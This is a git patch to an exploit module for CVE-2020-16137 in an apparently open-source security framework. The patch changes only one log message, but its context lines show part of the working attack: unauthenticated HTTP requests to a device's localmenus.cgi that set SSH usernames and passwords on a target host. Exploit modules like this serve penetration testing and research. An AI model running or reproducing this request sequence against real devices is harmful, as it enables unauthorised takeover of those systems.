From d43e071a7e05945237672e09d686bb3d96929c19 Mon Sep 17 00:00:00 2001 From: debifrank Date: Wed, 12 Aug 2020 11:24:20 -0400 Subject: [PATCH] Update CVE-2020-16137.py Removed jest and included more useful information. --- modules/exploits/linux/ssh/CVE-2020-16137.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/CVE-2020-16137.py b/modules/exploits/linux/ssh/CVE-2020-16137.py index 88f0e3596a..6797cacb58 100644 --- a/modules/exploits/linux/ssh/CVE-2020-16137.py +++ b/modules/exploits/linux/ssh/CVE-2020-16137.py @@ -61,7 +61,7 @@ def run(args): url = "http://{}/localmenus.cgi".format(args['rhost']) payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']} payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']} - logging.info("FIRING ZE MIZZLES!") + logging.info("Attempting to set SSH credentials.") try: r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT'])) if r.status_code != 200: